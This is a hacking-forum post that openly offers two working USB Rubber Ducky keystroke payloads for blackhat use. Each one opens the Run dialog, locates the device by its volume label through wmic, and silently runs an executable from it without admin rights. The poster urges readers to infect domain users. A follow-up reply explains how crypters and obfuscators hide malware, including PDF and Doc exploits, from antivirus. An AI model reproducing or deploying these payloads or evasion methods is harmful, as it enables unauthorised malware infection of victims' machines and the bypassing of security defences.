AgentGod

For long I have been searching around for a payload as such, but the only thing I found was the following; https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---runexe-from-sd Which essentially is not even 10% efficient. You need Administrative rights to use the Payload above (Diskpart) and what's with the Vbs. If you really do want to execute and run, you do not need to put the file in temp. You can put your file in a Winrar SFX which will put your malware into which folder you wish and run it there. Tutorial on that will come later, as I have too much to do. The below payload takes 3-4 seconds before executing. You have to remount (Plug in the Rubber ducky, let it install drivers, then replug it and have your file be executed). DELAY 3000 GUI r DELAY 100 STRING cmd /c for /f %a in ('wmic logicaldisk get volumename^, name ^| find "DUCKY"') do start "" /D %a\ %a\DUCKY.exe DELAY 10 ENTER That one is one of the codes, simple AF. It goes into Run line, uses the wmic logicaldisk command to search for the drive name of anything you want (Ducky) and executes it in matter of seconds. I believe the Terminal is up for a matter of seconds not even that. You can use the Twin Ducky to have your file stored on your ducky. I believe you can loop the command above so you do not need to replug, but it will just take long and is not worth it. This is another code, does the same, but is shorter: DELAY 3000 GUI r DELAY 100 cmd /c for /f %a in ('wmic volume get DriveLetter^, Label ^| find "DY"') do start %a\t.exe DELAY 10 ENTER The code above is almost instant (Depends on your malware size) And yes, this payload is meant for Blackhat activity. If you do edit it, do give proper credits. New scripts will come, making it easier for all of us to execute our files, going back to normal fast Autorun, not a 3 page long script that takes 15 minutes to execute. I forgot to mention, this does not require administrative rights, so no need to bypass the freaking UAC problems. And go on infect domain users. Winrar SFX:

This is not true. Obfuscation works in way that it ads bullshit code to the malware (If it's a malware you have) and can makes it Scantime FUD (Means if the AV scans it, it wont get detected), while if you run the same file that you just Obfuscated, it will not run if your "malware" is actually Runtime Detected. What a crypter does is to add deal code as you said just like the Obfuscator. Obfuscator changes variable names and such, while a crypter has 2 parts: the builder and the stub. The builder encrypts your server and binds it with the stub. When ran, the stub decrypts your server and injects your server into another process to be run. Obfuscators should not be used to hide malware, they are really for people to make their .exe's less 'decompileable.' So the source code of the program will not be found/leaked. I my self use Obfuscators for PDF and Doc Exploit, something which you can't crypt, but using an obfuscator you can easily bypass a few AVs.